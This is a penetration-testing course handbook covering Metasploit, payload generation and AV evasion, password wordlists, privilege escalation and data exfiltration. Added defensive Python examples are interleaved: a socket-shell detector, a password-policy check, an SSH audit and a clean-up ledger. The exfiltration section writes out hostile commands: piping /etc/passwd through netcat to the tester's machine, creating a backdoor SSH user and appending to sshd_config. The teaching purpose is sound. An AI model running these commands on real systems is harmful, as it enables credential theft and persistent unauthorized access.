
Post on 31-May-2020


Page 1: Technical Foundations Linux & Networking...differences when exploiting different targets (such as a Windows or Linux target). To change the target use the command: show targets As

Penetration Testing - Course Handbook

Technical Foundations Linux & Networking

Baruch Garcia-Gallo

1 | WYWM Penetration Testing Module Handbook

Table of Contents

Pentest ........................................................ 2
    Methodology ................................................ 2
    Exploitation ............................................... 2
        What you need to know about exploitation ............... 3
        Metasploit ............................................. 4
        Finding Published Exploits ............................. 8
        Available and Custom Created Wordlists for Brute-forcing 9
        Wordlists Available on Kali ............................ 9
        Generating Custom Wordlists ........................... 10
        Netcat ................................................ 12
    Post Exploitation ......................................... 12
        Privilege Escalation .................................. 12
        Data Exfiltration ..................................... 14
        Clean-up .............................................. 15

Pentest

A penetration test is the process of compromising/exploiting a target machine to gain root/admin privileges and download/exfiltrate company data. A penetration test (pentest) is conducted after vulnerability discovery has been carried out during a vulnerability assessment (VA).

You will be required to follow up the pentest by developing a detailed report, which will be of high value to the company hiring your services.

The report will outline the following:

• Exploitation method
• Data exfiltrated
• Affected systems
• How the client may remediate the issues found

Methodology

Reading the RoE/scope and conducting a vulnerability assessment (excluding report writing) are both to be completed before continuing with the penetration test.

Pentest Methodology

1. Exploitation: compromise the target system
2. Privilege Escalation: gain root/admin access
3. Data Exfiltration: extract private information
4. Clean-Up: remove any uploaded files, including backdoors etc.
5. Report Writing: it's all about supplying this end product

Exploitation

You can exploit a system not only through published vulnerabilities but also through service misconfigurations. For example, an FTP service might have anonymous user login enabled and allow file uploads using the anonymous login. This is not a vulnerability, as it is just how the service normally runs. However, it is a poorly designed component of the service, a misconfiguration that could allow an attacker to gain a foothold on the target. So, although we need to focus on vulnerability research, we also need to look at how each service is configured when attempting to exploit a target.

What you need to know about exploitation

The goal of exploiting a system (and ultimately of a penetration test) is to gain access to a target system and be able to exfiltrate sensitive data from the client's network. By exfiltrating business-critical sensitive data, you clearly show a company how their security posture is lacking and provide a means to improve their security.

How to exploit a system

To exploit a system, you need to have a way of directly interacting with the target. In computing, a shell is an interface through which you can interact with a machine. The command line interface in Kali is a shell (Bash stands for Bourne-again shell). When you hear pentesters speaking about getting shells, what they mean is that they want a direct interface through which they can interact with the target. Obviously, it is important to gain a direct interface with a target as it provides a possible means to read, write, delete and copy data on the target system.

Now that you know what a shell is and that you want to get a shell (have access to an interface through which you can interact with the target), you may be asking "how do I get a shell?". To get a shell you need to put what's called a "payload" onto the target system.

A payload is a file containing code that runs given commands once on the target system. These commands might create a shell (an interface) that is sent back to us. From here we can interact with the target system through the shell, much like we have interacted with our local Kali machine through the command line interface.

There are different types of shells that behave in different ways: bind shells and reverse shells.

Reverse shells are interfaces that are sent back to our machine. All we have to do is "catch" this incoming connection (with netcat or Metasploit's multi/handler).

Bind shells are interfaces that listen on an outward-facing port on the target machine. We must then connect to the given port on the target manually from our machine to access the shell (interface).

• Note that getting a shell on the target system is not the only means of data exfiltration, but it is the most versatile and complete way of having the ability to access all data on the target. That is why getting a remote shell is highly sought after when conducting a penetration test.
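As an added illustration (this is not code from the handbook), here is the defender's view of the two shell types above: on Linux a reverse or bind shell ends up as a shell or netcat process whose standard streams are sockets, which /proc/<pid>/fd makes visible. The snapshot layout, the constructed sample and the function names are my own.

```python
"""Detect shells whose standard streams are network sockets.

Both shell types end the same way on the compromised host: a shell or netcat
process whose stdin, stdout and stderr are a TCP socket. On Linux this shows
in /proc/<pid>/fd, where fds 0, 1 and 2 resolve to "socket:[inode]". The
check runs on a snapshot dict so it works offline; snapshot_from_proc()
builds the same structure from a live /proc.
"""
import os
import re
from typing import Dict, List

# Processes that are only suspicious when their stdio is a socket; a shell
# on a pty or netcat writing a transfer to a file is normal administration.
SHELL_LIKE = {"sh", "bash", "dash", "zsh", "ksh", "nc", "ncat", "netcat", "socat"}
SOCKET_RE = re.compile(r"^socket:\[\d+\]$")


def socket_stdio(fd_targets: Dict[int, str]) -> List[int]:
    """Return which of fds 0, 1 and 2 resolve to a socket."""
    return [fd for fd in (0, 1, 2) if SOCKET_RE.match(fd_targets.get(fd, ""))]


def find_socket_shells(snapshot: Dict[int, dict]) -> List[dict]:
    """snapshot maps pid -> {"comm": name, "ppid": int, "fds": {fd: link target}}.

    A hit needs at least two of the three standard streams on a socket: that
    is an interactive shell served over the network (reverse or bind), whereas
    a single socket fd is what an ordinary file transfer looks like.
    """
    hits = []
    for pid in sorted(snapshot):
        proc = snapshot[pid]
        if proc["comm"] not in SHELL_LIKE:
            continue
        fds = socket_stdio(proc["fds"])
        if len(fds) >= 2:
            hits.append({"pid": pid, "comm": proc["comm"],
                         "ppid": proc["ppid"], "socket_fds": fds})
    return hits


def snapshot_from_proc() -> Dict[int, dict]:
    """Build the snapshot from a live Linux /proc (needs read access to it)."""
    snap = {}
    for entry in os.listdir("/proc"):
        if not entry.isdigit():
            continue
        pid = int(entry)
        try:
            with open(f"/proc/{pid}/comm") as f:
                comm = f.read().strip()
            with open(f"/proc/{pid}/stat") as f:
                # stat is "pid (comm) state ppid ..."; comm may contain spaces,
                # so split on the last ')' before taking the ppid field.
                ppid = int(f.read().rsplit(")", 1)[1].split()[1])
            fds = {}
            for fd in (0, 1, 2):
                try:
                    fds[fd] = os.readlink(f"/proc/{pid}/fd/{fd}")
                except OSError:
                    pass  # fd closed or not readable
            snap[pid] = {"comm": comm, "ppid": ppid, "fds": fds}
        except (OSError, ValueError, IndexError):
            continue  # process exited or is not ours to read
    return snap


# Constructed snapshot: an admin's bash on a pty, a web server worker, a bash
# spawned by that worker with all stdio on one socket (a served shell), and a
# netcat that is only writing an incoming transfer to a file.
SAMPLE_SNAPSHOT = {
    1200: {"comm": "bash", "ppid": 1100,
           "fds": {0: "/dev/pts/0", 1: "/dev/pts/0", 2: "/dev/pts/0"}},
    2300: {"comm": "apache2", "ppid": 1,
           "fds": {0: "/dev/null", 1: "/dev/null", 2: "/var/log/apache2/error.log"}},
    2345: {"comm": "bash", "ppid": 2300,
           "fds": {0: "socket:[48213]", 1: "socket:[48213]", 2: "socket:[48213]"}},
    2400: {"comm": "nc", "ppid": 1200,
           "fds": {0: "/dev/pts/1", 1: "/home/admin/incoming.bin", 2: "/dev/pts/1"}},
}

if __name__ == "__main__":
    for hit in find_socket_shells(SAMPLE_SNAPSHOT):
        print(f"pid {hit['pid']} ({hit['comm']}, parent {hit['ppid']}) "
              f"has socket stdio on fds {hit['socket_fds']}")
```

The parent pid is the useful pivot: a shell whose parent is a web server worker or a service account process is the one worth investigating.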

Getting a Payload on the Target

The first stage of getting a shell is to get a payload on the target system. There are many ways to get a payload on the target machine or network. These can include sending phishing emails, watering hole attacks, USB drops or even using discovered vulnerabilities or misconfigurations in software or services to upload the payload directly to the target. Finding a way to get a payload onto the target device or network is the part of the penetration testing process that takes the largest amount of knowledge, skills and creativity.

Metasploit

Metasploit is a framework used to automate the exploitation of a target. Metasploit has a large range of exploitation modules that automatically run exploits against known vulnerabilities on a selected target; you only need to set a few options to be able to run one of these exploit modules. Metasploit also contains auxiliary modules which can assist in the enumeration of a target. The Rapid7 and Offensive Security websites have information regarding Metasploit modules to use for the exploitation of specific vulnerabilities. It is still important for you to understand the inner workings of an exploit when running Metasploit exploit modules, as fully understanding how they work means that when unexpected errors occur you can troubleshoot them successfully.

To start Metasploit you must first start the PostgreSQL service, which enables quicker searching when using Metasploit.

To set up Metasploit, type the following command:

    service postgresql start

To start Metasploit, use the command:

    msfconsole

From here Metasploit opens and you can begin by searching for modules to use. You can search for modules using the search command alongside the name of the service/software you are targeting. Metasploit has multiple module types available. The main modules you will be using during a penetration test, and even a vulnerability assessment, are:

• Auxiliary Modules: these modules assist in service enumeration and discovering software misconfigurations
• Post Exploitation Modules: these modules are to be used once access to a system has been gained but you do not have full privileges on the system. These modules assist in privilege escalation.
• Exploit Modules: these modules assist in the exploitation of a known vulnerability.

Example of searching for modules related to a specific piece of software:

    search proftpd

From here you will have a list of proftpd modules within the Metasploit framework.

You can get information about each module by using the info command.

Example of the info command:

    info exploit/unix/ftp/proftpd_133c_backdoor

Once you have decided which module you wish to use, you need to select it. To select an exploit module you call the use command:

    use exploit/unix/ftp/proftpd_133c_backdoor

Once you have loaded a module you can then see all options that are available to be set in the loaded module.

In the basic options section you can see which options are required for the module to work properly; these will be marked as yes under required.

In some exploit modules you can change the payload and targets, as some modules have different options when exploiting different targets (such as a Windows or Linux target).

To list the available targets use the command (the selected target is then changed with set target <id>):

    show targets

As you can see with the proftpd backdoor exploit, the target is set automatically with an id of 0. In this instance you can only select one operating system or software option to set as the designated target.

Below you will see an example of show targets for the recent EternalBlue exploit; in this instance you can see this exploit will only be effective against Windows Server 2008 R2 x64 or Windows 7 machines.

Metasploit commands

Command: set
Examples: set payload, set rhost, set lport
Description: sets individual exploit options

Command: show
Examples: show options, show targets, show payloads
Description: provides a list of options, targets or payloads for a specific module

Command: use
Examples: use <module name>
Description: select a module to use

Command: search
Examples: search <service/software name>
Description: search for modules related to specific software or a service

Command: use exploit/multi/handler
Examples: a handler to catch a payload as it connects back to your local machine (much like netcat)
Description: catch a connection coming back to the local host from a payload

Creating your own payload

Kali has many inbuilt webshells that you can use as required (in the /usr/share/webshells/ directory).

You can also use msfvenom to create payloads which, given that certain vulnerabilities or misconfigurations are present, you may be able to upload directly onto the target. Msfvenom works by generating shellcode for you. Another tool for shellcode generation is Veil-Ordnance, part of the Veil framework.

Msfvenom can also encode your payloads in an attempt to hide them from antivirus; however, most AV solutions pick up msfvenom payloads because they use a base template which can be easily detected. Other encoders include Ps1encode for PowerShell-based payloads and Veil-Evasion, part of the Veil framework. Veil generates shellcode that can bypass most anti-virus solutions.

Msfvenom is already preinstalled on Kali (see the msfvenom cheat sheet for usage); however, you can install Veil easily by using the command:

    git clone https://github.com/Veil-Framework/Veil

As you can see above, Veil-Ordnance and Veil-Evasion are in the Veil Tools directory, ready for use.

Finding Published Exploits

When using exploits, you should use exploits that come from a reliable source such as exploit-db, or you should be able to look at the exploit code and understand how the exploit works. This is because some exploits may harbor malicious code which you obviously do not want to introduce into a client's network.

Exploits archived on Offensive Security's Exploit Database are peer reviewed and reliable and therefore can be used during a penetration test.

Exploit-db: https://www.exploit-db.com/
Shodan exploits: https://exploits.shodan.io/welcome
Packetstorm: https://packetstormsecurity.com/files/tags/exploit/

However, sometimes these exploits are only usable for a specific target type (such as Windows Server 2010 and earlier) even though later Windows Server versions may be vulnerable to the specific vulnerability that the exploit targets. In this instance, to exploit a vulnerable Windows Server 2016 machine you would have to edit the exploit. This is true for the EternalBlue vulnerability, which affects Windows machines running SMBv1.

Available and Custom Created Wordlists for Brute-forcing

When brute-forcing usernames, passwords or directories you can use wordlists. Many wordlists are available in Kali or for download online, and you can also create your own custom wordlists using tools in Kali.

Wordlists Available on Kali

Below is a table of wordlists available in Kali and where to find them.

Wordlist Type: Password List
Wordlist File Names: rockyou.txt, adobe_top100_pass.txt, idrac_default_pass.txt, hci_oracle_passwords.txt, http_default_pass.txt, default_pass_for_services_unhash.txt, db2_default_pass.txt, ipmi_passwords.txt, mirai_passwords.txt, multi_vendor_cctv_dvr_pass.txt, snmp_default_pass.txt, vnc_passwords.txt, tomcat_mgr_default_pass.txt, postgres_default_pass.txt, passwords.lst, oracle_default_passwords.csv, unix_passwords.txt
Location: /usr/share/wordlists/ and /usr/share/wordlists/metasploit

Wordlist Type: Directory Lists
Wordlist File Names: small.txt, big.txt, best1050.txt, best110.txt, best15.txt
Location: /usr/share/wordlists/dirb/others

Wordlist Type: First Names
Wordlist File Names: names.txt
Location: /usr/share/wordlists/dirb/others

Wordlist Type: Webserver-specific Directories and Files list
Wordlist File Names: apache.txt, coldfusion.txt, axis.txt, cgis.txt, domino.txt, fatwire_pagenames.txt, fatwire.txt, frontpage.txt, hpsmh.txt, hyperion.txt, iis.txt, iplanet.txt, jboss.txt, jersey.txt, jrun.txt, netware.txt, oracle.txt, ror.txt, sap.txt, sharepoint.txt, sunas.txt, test.txt, tomcat.txt, vignette.txt, weblogic.txt, websphere.txt
Location: /usr/share/wordlists/dirb/vulns

Wordlist Type: Linux Sensitive Files
Wordlist File Names: sensitive_files.txt
Location: /usr/share/wordlists/metasploit

Generating Custom Wordlists

To have a higher chance of success during brute force attacks you can create your own custom password lists. Many people create passwords that relate personally to them so that they have a higher chance of remembering their password. In this way you can generate custom password lists based on a person's birthdays, pets, family, likes, dislikes and so on.

CeWL

CeWL stands for Custom Word List generator and, as the name suggests, generates custom wordlists. CeWL crawls a given webpage and makes a wordlist based on specified parameters. You can specify any webpage, including a target individual's social media accounts or webpages of interest to the individual. As an example, imagine you are on a pentest and you know the network administrator is obsessed with 'The Beatles'. Thinking that he has incorporated this into his password, you could use the following CeWL command:

    cewl https://en.wikipedia.org/wiki/The_Beatles -d 1 -m 5 -w beatlesPassList.txt

Here CeWL is generating a wordlist called beatlesPassList.txt by crawling all words on the Beatles Wikipedia webpage. It only includes words that are 5 characters or longer, and it stays on the Wikipedia page, not crawling links from the webpage.

-d  The depth CeWL will crawl with regard to links on a webpage
-m  Limits the wordlist to words with a length equal to or over the specified number of characters
-w  Outputs the wordlist into a specified file

CUPP

CUPP, or Common User Passwords Profiler, creates a profile of the target person based on their birthdate, pets, children, spouse and so on, and then uses this information to create a wordlist. Wordlists created by CUPP can be used to brute force passwords for employees' emails, FTP and SSH, web login portals and internal system access. Below is a screenshot of the questions CUPP uses to profile an individual and create a password list. CUPP also takes into consideration that some people may use numbers to replace some letters within words in their password; as such, CUPP wordlists contain password variations based on this characteristic.
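The CeWL and CUPP sections describe how a wordlist is built from what a person cares about and padded with digit-for-letter variants; the defensive counterpart is a password-policy check that refuses passwords which are only such words in disguise. The code below is an added example, not from the handbook or either tool; the wordlist contents are constructed and the function names are mine.

```python
"""Password-policy check against a target-specific (CeWL-style) wordlist.

The check undoes the substitutions CUPP-style generators apply, drops a
leading or trailing run of digits/symbols (years, "!", "123") and then
looks for a wordlist word in what is left.
"""
import re
from typing import Iterable, Optional, Set

# Reverse of the digit/symbol-for-letter substitutions seen in generated lists.
LEET = str.maketrans({"0": "o", "1": "i", "3": "e", "4": "a", "5": "s",
                      "7": "t", "@": "a", "$": "s", "!": "i"})
AFFIX = re.compile(r"^[^a-z]+|[^a-z]+$")


def candidates(password: str) -> Set[str]:
    """Two normalisations: strip affixes then un-leet, and un-leet then strip.

    "b3atl3s1969" needs the first order (otherwise the year is turned into
    letters); "p3nnylan3" needs the second (its last character is a
    substituted letter, not a suffix).
    """
    p = password.lower()
    return {AFFIX.sub("", p).translate(LEET), AFFIX.sub("", p.translate(LEET))}


def matches_wordlist(password: str, wordlist: Iterable[str], min_len: int = 5) -> Optional[str]:
    """Return the longest wordlist word the password is built from, else None.

    min_len mirrors CeWL's -m: short words such as "the" would match far too
    many unrelated passwords.
    """
    words = sorted({w.lower() for w in wordlist if len(w) >= min_len},
                   key=lambda w: (-len(w), w))
    cands = candidates(password)
    for word in words:
        if any(word in c for c in cands):
            return word
    return None


def load_wordlist(path: str) -> Set[str]:
    """Read a one-word-per-line file such as the beatlesPassList.txt CeWL writes."""
    with open(path, encoding="utf-8", errors="ignore") as f:
        return {line.strip() for line in f if line.strip()}


# Constructed stand-in for what the handbook's cewl command might produce.
SAMPLE_WORDLIST = {"Beatles", "Lennon", "McCartney", "Harrison", "Starr",
                   "Liverpool", "PennyLane", "Strawberry", "Abbey", "the", "band"}

if __name__ == "__main__":
    for pw in ("B3atl3s1969", "Str@wberryF!elds", "p3nnylan3", "correct horse battery staple"):
        print(f"{pw!r}: {matches_wordlist(pw, SAMPLE_WORDLIST) or 'no wordlist match'}")
```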

Netcat

Netcat is considered the hacking Swiss army knife. Netcat allows you to connect to open ports, view service versions from open ports, interact with services on open ports, listen on ports on your own machine for incoming connections, listen with programs to allow a remote connection to interact with a given program on a designated port, as well as send programs to other machines through open ports. As you can see, netcat is very versatile and is a good starting point when interacting with a service running on an open port or receiving a connection instigated by a payload you uploaded onto a remote machine during exploitation of the target.

netcat syntax

    netcat <flags> <ip address or domain name> <port number>

Note: an IP address is not required if you are just listening on the local host.

netcat flags

-n  Numeric IP address rather than a domain name
-v  Verbosity (add two v's for double verbosity). This option shows more information such as IP addresses and other connection information. Verbosity is helpful when determining the IP address of a domain obscured by a WAF.
-l  Listens on a port on your local machine with netcat. Using the -l flag, you do not need to specify an IP address as you are listening on the local host.
-p  Specify a target port

Post Exploitation

Once a system has been exploited and some control has been gained, we move to what's known as post exploitation, which may include uploading files and tools to the target machine, privilege escalation, data exfiltration, the clean-up of our presence on the system, etc.

Privilege Escalation

Privilege escalation (PrivEsc) is just that: the act of elevating user privileges/permissions on the target machine, so as to gain further control of the target machine and access to confidential data. You'll often gain access with normal user level permissions, with the aim to then elevate these to root user permissions.

There are numerous methods to conduct PrivEsc and they predominantly fall into the following two categories: privilege escalation exploits, and taking advantage of security misconfigurations. Again, the exact methods are specific to the target environment.

In this course I'll introduce the following PrivEsc methods, giving an example in the videos.

Kernel Exploits, e.g. Dirty COW

By taking advantage of kernel vulnerabilities an attacker can potentially gain the ability to read, write, and execute arbitrary commands with root user permissions. Dirty COW is one such exploit and affects almost all versions of Linux since 2005. It allows an adversary to gain high level write permissions to an otherwise read-only area of the target. And although this exploit may cause system instability (so use with caution), I have shown it in the videos as it's considered one of the most important and serious local Linux PrivEsc exploits.

Service Configurations

Weak configurations are commonly used for PrivEsc as they are common and have a lower impact on the overall target system than kernel exploits. Listed below are some potential methods of this.

Weak and Reused Passwords: you can often PrivEsc by attempting to use weak or reused passwords found during enumeration.

SUID/Services that Run as Root: you can potentially get these services to run your commands as root. These services may initially seem harmless, however they offer the ability to run scripts, e.g. Nmap, Bash, Nano, Vim, cp.

Sudo: if your current permissions on the target machine allow you to run a program using sudo then you can potentially run commands on the target system. As discussed earlier, this can be done by typing either sudo or su before the command.

PrivEsc Tools

The above list is only an insight into possible PrivEsc methods. So, with many potential methods, a great place to start, especially if you are limited for time, is with automated tools. Below I'll list a few tools for elevating your privileges on both Linux and Windows target machines.

LinEnum is a script that runs a range of PrivEsc checks including: kernel details, system info, user info, password policies, checks for stored password hashes, privilege access, permissions, whether the current user has sudo access, lists cron jobs, checks for default and/or weak credentials, locates SUID files and world-writable files, NFS details, searches log files, plus more.

LinEnum is located at https://github.com/rebootuser/LinEnum

Example syntax:

    ./LinEnum.sh -k <keyword> -r <report name> -e <export location /tmp/> -t

-t = a thorough scan. Otherwise the default scan is a quick scan.

Unix-privesc-check is a script that searches for security misconfigurations which may allow a normal user to escalate privileges. It can be used on different target operating systems including Linux, Unix and Solaris.

Unix-privesc-check is located at: https://github.com/pentestmonkey/unix-privesc-check

Syntax:

    unix-privesc-check <standard or detailed>

Windows-privesc-check offers similar functionality on Windows target systems as unix-privesc-check does on Linux targets.

Windows-privesc-check is located at: https://github.com/pentestmonkey/windows-privesc-check/

PowerSploit (PowerShell Post Exploitation Framework) is a collection of PowerShell modules useful during all stages of a pentest on a Windows target machine. These modules range from reconnaissance, PrivEsc and code execution to data exfiltration.

PowerSploit can be located at: https://github.com/PowerShellMafia/PowerSploit/

I recommend checking out the above link for more information on PowerSploit and its operation.

Data Exfiltration

Data exfiltration is essentially the act of downloading data/files from the target machine. In our case, as a pentester, this data is used as evidence to support our findings. Data can be exfiltrated using numerous methods dependent on the target environment; some of these are listed below.

Shells: certain shells such as Meterpreter (shown in the video and cheat sheet) let you simply use standard commands to navigate through the target system. If the target system is a Windows OS you can use PowerShell or PowerSploit (as outlined above).

Payloads: Metasploit contains a range of payloads capable of exfiltrating data, e.g. backdoors can be used to both upload and download data from the target machine.

Netcat: netcat can be easily used to transfer data between the target and your machine. You can do this with the following commands.

Your machine (in the directory where you want to save the file):

    nc -l -p 4444 > <filename>

Target machine (in /etc):

    cat passwd | nc <your IP> 4444

SSH: if the SSH daemon is up you can create a new user and SSH into the target machine.

Check SSH is up:

    netstat -tulpn | grep sshd

Create a new user on the target machine:

    /usr/bin/useradd <username>

Create the new user's password on the target machine:

    /usr/bin/passwd <username>

Set the password to something easy, e.g. abc123

Add the new user to the SSH config file:

    echo "AllowUsers <username>" >> /etc/ssh/sshd_config

Now on your machine type the following, and enter the password you set when prompted:

    ssh <username>@<target IP>
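The SSH steps above leave two durable traces on the target: an account that was not there before and an extra AllowUsers line at the end of sshd_config. As an added example (not from the handbook), the audit below is what a defender, or the tester at clean-up time, can run to find both; the sample file contents, baselines and function names are constructed by me.

```python
"""Audit for the SSH-persistence pattern: a new local account plus an
AllowUsers line appended to sshd_config.

The current /etc/passwd and sshd_config contents are passed in as strings
and compared against a baseline taken at the start of the engagement (or
from configuration management). Findings: accounts outside the baseline,
AllowUsers entries naming unapproved accounts, and more than one AllowUsers
directive, which is exactly what an appended echo leaves behind.
"""
from typing import Dict, List, Set


def parse_passwd(text: str) -> Dict[str, int]:
    """Map account name -> uid for every well-formed /etc/passwd line."""
    users = {}
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) >= 3 and fields[2].isdigit():
            users[fields[0]] = int(fields[2])
    return users


def parse_allowusers(text: str) -> List[List[str]]:
    """Return every AllowUsers directive as its own list of patterns.

    sshd accepts the keyword more than once and adds each line's patterns
    to the allow list, so an appended line widens access silently.
    """
    directives = []
    for line in text.splitlines():
        stripped = line.strip()
        if stripped.lower().startswith("allowusers"):
            directives.append(stripped.split()[1:])
    return directives


def audit(passwd: str, sshd_config: str,
          baseline_users: Set[str], approved_ssh: Set[str]) -> List[str]:
    """Return one finding per deviation; an empty list means clean."""
    findings = []
    for name, uid in sorted(parse_passwd(passwd).items()):
        if name not in baseline_users:
            findings.append(f"account not in baseline: {name} (uid {uid})")
    directives = parse_allowusers(sshd_config)
    if len(directives) > 1:
        findings.append(f"{len(directives)} AllowUsers lines present; expected at most one")
    for patterns in directives:
        for pat in patterns:
            user = pat.split("@", 1)[0]  # AllowUsers also takes user@host patterns
            if user not in approved_ssh:
                findings.append(f"AllowUsers grants SSH to unapproved account: {pat}")
    return findings


def audit_live(baseline_users: Set[str], approved_ssh: Set[str],
               passwd_path: str = "/etc/passwd",
               sshd_path: str = "/etc/ssh/sshd_config") -> List[str]:
    """Run the audit against the real files on a Linux host (read access needed)."""
    with open(passwd_path) as p, open(sshd_path) as s:
        return audit(p.read(), s.read(), baseline_users, approved_ssh)


# Constructed sample: one account and one AllowUsers line were added after
# the baseline was taken.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
svc-backup:x:1001:1001::/home/svc-backup:/bin/bash
"""
SAMPLE_SSHD_CONFIG = """\
Port 22
PermitRootLogin no
AllowUsers alice
PasswordAuthentication no
AllowUsers svc-backup
"""
BASELINE_USERS = {"root", "daemon", "alice"}
APPROVED_SSH = {"alice"}

if __name__ == "__main__":
    for finding in audit(SAMPLE_PASSWD, SAMPLE_SSHD_CONFIG, BASELINE_USERS, APPROVED_SSH):
        print(finding)
```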

FTP: File Transfer Protocol can often be used to transfer files from the target machine; you may even find anonymous FTP logins.

Web server: hosting the files on the target machine's web server.

NFS Share: NFS, or Network File System, can be considered as shared file storage on the target machine. Through the process of mounting you can potentially gain access to certain directories such as the tmp directory.

E.g.

    mount <target IP>:/ /tmp/

If successful you can go to /tmp/share to view its contents.

CrackMapExec: one of CrackMapExec's functions is to gather clear-text Windows credentials from a target Windows machine. It is located at https://github.com/byt3bl33d3r/CrackMapExec

I recommend going to the above link to read the documentation and instructions.

Clean-up

As you can imagine, leaving shells waiting for a real adversary after the pentest is complete is not a good idea, and as such cleaning up the target system should always be on your mind and not just an afterthought. So, along with the records you should already be keeping, simply add notes on what alterations were made to the system and where they were made. These recorded alterations should include everything from users created, logs altered, payloads uploaded and more. These notes need to be meticulous in order to prevent you missing something and compromising the target system's security.

These notes aren't just for your records; they will also provide administrators a list of actions necessary in the event that you are unable to remove a file or time constraints don't allow you to clean the target.

When cleaning up, simply use the rm command to remove all items on your list, then undo any actions you performed on the system. And when complete, let the sysadmins know what has been completed.
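The notes the section asks for are easiest to act on if they are kept in a structured form from the first change onward. As an added example (not from the handbook), the ledger below records each alteration as it is made and turns the list into the clean-up commands, a verification for each, and the hand-over list for the administrators; the host names, paths and account names in the sample are constructed and the class and method names are mine.

```python
"""Engagement change ledger: the clean-up notes kept in a form that produces
the clean-up commands and the administrator hand-over list.

Each alteration made to a target (uploaded file, created account, appended
config line, listener left running) is recorded as it happens; the ledger
then emits the reverse action newest-first with a verification command for
each, and lists whatever was not undone for the report.
"""
import re
import shlex
from dataclasses import dataclass, field, asdict
from typing import List

KINDS = {"file", "user", "config_line", "listener"}


def _sed_escape(text: str) -> str:
    """Escape a literal line for use inside a sed basic-regex address."""
    return re.sub(r"([\\/.*\[\]^$])", r"\\\1", text)


@dataclass
class Change:
    host: str
    kind: str     # one of KINDS
    detail: str   # file: path; user: name; config_line: "path|line"; listener: "port/proto"
    note: str = ""
    undone: bool = False

    def undo_command(self) -> str:
        if self.kind == "file":
            return f"rm -f {shlex.quote(self.detail)}"
        if self.kind == "user":
            return f"userdel -r {shlex.quote(self.detail)}"
        if self.kind == "config_line":
            path, line = self.detail.split("|", 1)
            return f"sed -i {shlex.quote('/^' + _sed_escape(line) + '$/d')} {shlex.quote(path)}"
        return f"# stop the process listening on {self.detail}"

    def verify_command(self) -> str:
        """A command that succeeds only once the change is really gone."""
        if self.kind == "file":
            return f"test ! -e {shlex.quote(self.detail)}"
        if self.kind == "user":
            return f"! id {shlex.quote(self.detail)} >/dev/null 2>&1"
        if self.kind == "config_line":
            path, line = self.detail.split("|", 1)
            return f"! grep -qxF {shlex.quote(line)} {shlex.quote(path)}"
        port = self.detail.split("/", 1)[0]
        return f"! ss -ltn | grep -q {shlex.quote(':' + port + ' ')}"


@dataclass
class Ledger:
    changes: List[Change] = field(default_factory=list)

    def record(self, host: str, kind: str, detail: str, note: str = "") -> None:
        if kind not in KINDS:
            raise ValueError(f"unknown change kind: {kind}")
        self.changes.append(Change(host, kind, detail, note))

    def cleanup_plan(self) -> List[str]:
        """Undo then verify, newest first, so a user's files go before the user."""
        return [f"[{c.host}] {c.undo_command()} && {c.verify_command()}"
                for c in reversed(self.changes) if not c.undone]

    def mark_undone(self, host: str, detail: str) -> None:
        for c in self.changes:
            if c.host == host and c.detail == detail:
                c.undone = True

    def handover(self) -> List[dict]:
        """What the administrators must still remove, for the report."""
        return [asdict(c) for c in self.changes if not c.undone]


if __name__ == "__main__":
    ledger = Ledger()
    ledger.record("web01", "file", "/var/www/html/uploads/cmd.php", "webshell used for foothold")
    ledger.record("web01", "user", "svc-backup", "account created for SSH access")
    ledger.record("web01", "config_line", "/etc/ssh/sshd_config|AllowUsers svc-backup")
    ledger.record("web01", "listener", "4444/tcp", "netcat transfer listener")
    print("\n".join(ledger.cleanup_plan()))
```

The plan is printed rather than executed on purpose: each line is run by hand on the named host, and only then is the entry marked undone, so the hand-over list stays honest.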